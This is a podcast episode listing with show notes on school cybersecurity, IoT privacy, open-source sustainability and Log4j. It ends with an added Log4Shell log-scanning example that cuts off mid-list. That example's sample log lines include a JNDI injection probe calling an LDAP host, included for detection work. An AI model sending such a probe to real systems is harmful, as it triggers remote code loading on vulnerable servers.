BrakeSec Education Podcast


463 episodes — Page 2 of 10

Logging analysis, log correlation, and threat analysis discussion continues - p2


https://twitch.tv/brakesec
www.brakeingsecurity.com
@infosystir on Twitter
@bryanbrake
@boettcherpwned

Apr 10, 2022, 35 min

Amanda and Bryan discuss log analysis, finding IOCs, and what to do about them.


https://twitch.tv/brakesec
www.brakeingsecurity.com
@infosystir on Twitter
@bryanbrake
@boettcherpwned

Apr 5, 2022, 35 min

Shannon Noonan and Stacey Cameron - process automation - p2


Shannon Noonan and Stacey Cameron - QoS Consulting
https://www.bizagi.com/en/blog/digital-process-automation/4-ways-to-deliver-change-management-for-process-automation
https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/
https://www.tibco.com/reference-center/what-is-process-automation
https://kissflow.com/workflow/workflow-automation/an-8-step-checklist-to-get-your-workflow-ready-for-automation/
https://www.malwarearchaeology.com/cheat-sheets
https://overapi.com/
https://www.darkreading.com/attacks-breaches/8-character-passwords-can-be-cracked-in-less-than-60-minutes

Mar 22, 2022, 1h 15m

Shannon Noonan and Stacey Cameron - process automation


https://www.twitch.tv/brakesec
Youtube video (full version): https://www.youtube.com/watch?v=eRwYB22XMNw
Shannon Noonan and Stacey Cameron - QoS Consulting
https://www.bizagi.com/en/blog/digital-process-automation/4-ways-to-deliver-change-management-for-process-automation
https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/
https://www.tibco.com/reference-center/what-is-process-automation
https://kissflow.com/workflow/workflow-automation/an-8-step-checklist-to-get-your-workflow-ready-for-automation/
https://www.malwarearchaeology.com/cheat-sheets
https://overapi.com/
https://www.darkreading.com/attacks-breaches/8-character-passwords-can-be-cracked-in-less-than-60-minutes

Mar 12, 2022, 59 min

S2022 Ep 8 - K12SIX-project-Doug_Levin-Eric_Lankford-threat_intel-edusec-p2


For context, we at the K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our 'essential protections' series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections

https://www.grf.org/ Global Resilience Federation: We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies. We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication. Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.

https://static1.squarespace.com/static/5e441b46adfb340b05008fe7/t/611d5fceff375d79ff4507c7/1629315022292/K12+SIX+Essential+Cybersecurity+Protections+2021+2022.pdf
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.highereddive.com/spons/inside-higher-educations-ransomware-crisis-how-colleges-and-universities/609688/
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
https://www.13abc.com/2021/02/22/toledo-public-school-students-seeing-effects-of-massive-data-breach/
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% of school systems have 2,500 students or fewer
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc – Florida mom, daughter accused of rigging homecoming queen votes break silence | GMA

There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here's how they break down:
All: 130,930
Elementary schools: 87,498
Secondary schools: 26,727
Combined schools: 15,804
Other: 901

Questions:
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the ISAC help?
How do you communicate major security events like log4j?
Do you keep track of complications with certain software stacks?
Someone listening might say "hey, I'd love to help…" What opportunities, if any, are there for the larger infosec community to help your org?

Mar 1, 2022, 52 min

S2022 Ep 7 - K12SIX's Eric Lankford and Doug Levin on helping schools get added security - p1


The K12 Security Information Exchange (K12 SIX) is a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our 'essential protections' series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections

https://www.grf.org/ Global Resilience Federation: We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies. We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication. Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.

https://static1.squarespace.com/static/5e441b46adfb340b05008fe7/t/611d5fceff375d79ff4507c7/1629315022292/K12+SIX+Essential+Cybersecurity+Protections+2021+2022.pdf
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.highereddive.com/spons/inside-higher-educations-ransomware-crisis-how-colleges-and-universities/609688/
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
https://www.13abc.com/2021/02/22/toledo-public-school-students-seeing-effects-of-massive-data-breach/
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% of school systems have 2,500 students or fewer
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc – Florida mom, daughter accused of rigging homecoming queen votes break silence

There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here's how they break down:
All: 130,930
Elementary schools: 87,498
Secondary schools: 26,727
Combined schools: 15,804
Other: 901

Questions:
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the ISAC help?
How do you communicate major security events like log4j?
Do you keep track of complications with certain software stacks?
Someone listening might say "hey, I'd love to help…" What opportunities, if any, are there for the larger infosec community to help your org?

Feb 22, 2022, 42 min

S2022 Ep 6 - April Wright and Alyssa Miller - IoT platforms, privacy and security, embracing standards


Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)

Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license
Open source conference at Whitehouse:
https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/
https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406
"For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google, in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all."
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19

IoT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways - Devices - Mobile apps - SDKs - integrations
Cloud services DO go offline, point of failure: https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
Network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/

Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking: https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html
Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a 'happy medium' to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?)
Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…")
Is what Airtags doing enough to reduce the fear? Are we designing to edge cases?
There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT vendors to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf and https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs

Threat modeling, vulnerabilities in IoT networks and platforms
Does your IoT platform give out SDKs for integrations or allow 3rd party products or apps?
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK - Opt-out of Amazon Sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch: As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-

Feb 15, 2022, 41 min

S2022 Ep 5 - Alyssa Miller, April Wright, on IoT Privacy & Security, using tech for stalking, what could be done? Part 1


Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
Talk about side projects, podcasts, speaking events, etc (if you want to)

Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license
Open source conference at Whitehouse:
https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/
https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406
"For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google, in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all."
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19

IoT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways - Devices - Mobile apps - SDKs - integrations
Cloud services DO go offline, point of failure: https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
Network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/

Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking: https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html
Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a 'happy medium' to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?)
Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…")
Is what Airtags doing enough to reduce the fear? Are we designing to edge cases?
There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT vendors to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf and https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs

Threat modeling, vulnerabilities in IoT networks and platforms
Does your IoT platform give out SDKs for integrations or allow 3rd party products or apps?
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK - Opt-out of Amazon Sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch: As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Side

Feb 7, 2022, 34 min

S2022 Ep 3 - Bit of news, Belarus train system hack, VMware Horizon vulns, edge network device vulns


News articles we covered this week:
https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/
https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/
https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/
https://www.bleepingcomputer.com/news/security/over-20-000-data-center-management-systems-exposed-to-hackers/

Whimmery's Walkthroughs: Join @whimmery on her twitch or on the @brakesec Youtube channel for walkthroughs on Burp Suite training and more!

Twitter handles:
Official Podcast: @brakesec
Brian Boettcher: @boettcherpwned
Amanda Berlin: @infosystir @hackersHealth @infosecroleplay
Bryan Brake: @bryanbrake

Feb 1, 2022, 43 min

S2021 Ep 3 - April Wright and Alyssa Miller - Open Source sustainability


Alyssa Miller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)

0. Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license
Open source conference at Whitehouse:
https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/
https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406
"For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google, in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all."
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19

IoT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways - Devices - Mobile apps - SDKs - integrations
Cloud services DO go offline, point of failure: https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
Network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/

Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking: https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html
Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a 'happy medium' to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?)
Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…")
Is what Airtags doing enough to reduce the fear? Are we designing to edge cases?
There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT vendors to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf and https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs

Threat modeling, vulnerabilities in IoT networks and platforms
Does your IoT platform give out SDKs for integrations or allow 3rd party products or apps?
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK - Opt-out of Amazon Sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch: As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like

Jan 24, 2022, 26 min

S2021 Ep 2 - Amélie Koran and Adam Baldwin discuss OSS sustainability, supply chain security, governance, and outreach for popular applications - part 2


Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/

F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
https://developers.slashdot.org/story/22/01/09/2336239/open-source-developer-intentionally-corrupts-his-own-widely-used-libraries
Faker.js - https://www.npmjs.com/package/faker - Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/pafaker - npm package/colors get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/

Should OSS teams expect payment for giving their time/code away for free? What are their expectations?
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, "Hobbyists" were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software - History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this --AK)
Event-stream = https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
https://libraries.io/ - Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.

Jan 18, 2022, 46 min

S2022 Ep 1 - OSS sustainability, log4j fallout, developer damages own code - p1


Adam Baldwin (@adam_baldwin)
Amélie Koran (@webjedi)

Log4j vulnerability
https://logging.apache.org/log4j/2.x/license.html
https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/

F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS.
https://twitter.com/BleepinComputer/status/1480182019854327808
https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
https://developers.slashdot.org/story/22/01/09/2336239/open-source-developer-intentionally-corrupts-his-own-widely-used-libraries
Faker.js - https://www.npmjs.com/package/faker - Generate massive amounts of fake contextual data
Colors.js - https://www.npmjs.com/pafaker - npm package/colors get color and style in your node.js console
https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/

Should OSS teams expect payment for giving their time/code away for free? What are their expectations?
Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity?
OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/
https://webjedi.net/2022/01/03/security-puppy/
Apparently, "Hobbyists" were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists
https://en.wikipedia.org/wiki/History_of_free_and_open-source_software - History of open source
Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this)
Event-stream = https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
https://libraries.io/ - Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.

Jan 12, 2022, 43 min

S2021 Ep 46 - 2021-046 - Mick Douglas, Log4j vulnerabilities, egress mitigations - part 2


Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
Why wasn't this given the same visibility in 2009? Because it's Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don't know?
Egress traffic (discussed at length on twitter, what problems does it solve?) https://twitter.com/mubix/status/1470430085169745920

Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache removed JNDI functionality
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about "SBOM solving the issue". @K8em0 weighs in: https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?) 2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016…
https://twitter.com/bettersafetynet/status/1469470284977745932 Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread. When dealing with attacks like this you should remember the acronym IMMA. I = Isolate M = Minimize M = Monitor A = Active Defense

https://github.com/MarkBaggett/srum-dump "SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind."
https://support.microsoft.com/en-us/office/digitally-sign-your-macro-project-956e9cc8-bbf6-4365-8bfa-98505ecd1c01

Dec 23, 2021 - 40 min

S2021 Ep 45 2021-045-Mick Douglas, Log4j vulnerabilities, egress mitigations - part1


Introduction / overview of the Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Patching vs. mitigation
Why wasn't this given the same visibility in 2009? Because it's Oracle or Java?
Good callout: building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don't know?
Egress traffic (discussed at length on Twitter; what problems does it solve?) https://twitter.com/mubix/status/1470430085169745920

Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache disabled JNDI lookups by default in Log4j 2.16.0
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about "SBOM solving the issue". @K8em0 weighs in: https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of vendor advisories for log4j

Mitigation:
https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?)
2009 in fact: CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable (OpenJDK…)
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 - "You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string..."
Discussed in 2016 at Black Hat: https://twitter.com/th3_protoCOL/status/1469644923028656130 - "The #Log4Shell attack vector was known since 2016…"
https://twitter.com/bettersafetynet/status/1469470284977745932 - "Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread. When dealing with attacks like this you should remember the acronym IMMA. I = Isolate, M = Minimize, M = Monitor, A = Active Defense"
https://github.com/MarkBaggett/srum-dump - "SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ESE database, then check out ese2csv. ese2csv.exe is designed specifically for CSV files with the CLI user in mind."
https://support.microsoft.com/en-us/office/digitally-sign-your-macro-project-956e9cc8-bbf6-4365-8bfa-98505ecd1c01
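Added example, not from the episode or its show notes (it applies to both parts of the Mick Douglas Log4j discussion above): a small Python detector for the "detections" item, run over constructed web-server access-log lines. The client IPs and callback hosts are documentation/test addresses, and example-canary.invalid is a made-up stand-in for a canary hostname like the Canarytokens one the notes mention. The point it adds is that a plain `${jndi:` string match misses most real probes, so the scanner first undoes the common obfuscations (percent-encoding, `${lower:}`/`${upper:}` lookups, and `${x:-y}` default-value lookups) and only then extracts the callback scheme and host. The distinct callback hosts it reports are what the egress-filtering thread is about: a host that cannot reach them cannot fetch the second stage over LDAP/RMI or leak via DNS.

```python
import re
import urllib.parse

# Constructed access-log lines (not from the episode). Four carry Log4Shell
# probes in the shapes seen in the wild: plain, case-lookup obfuscated,
# URL-encoded, and default-value obfuscated. Addresses are test/documentation
# ranges; example-canary.invalid stands in for a canary hostname.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:13:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
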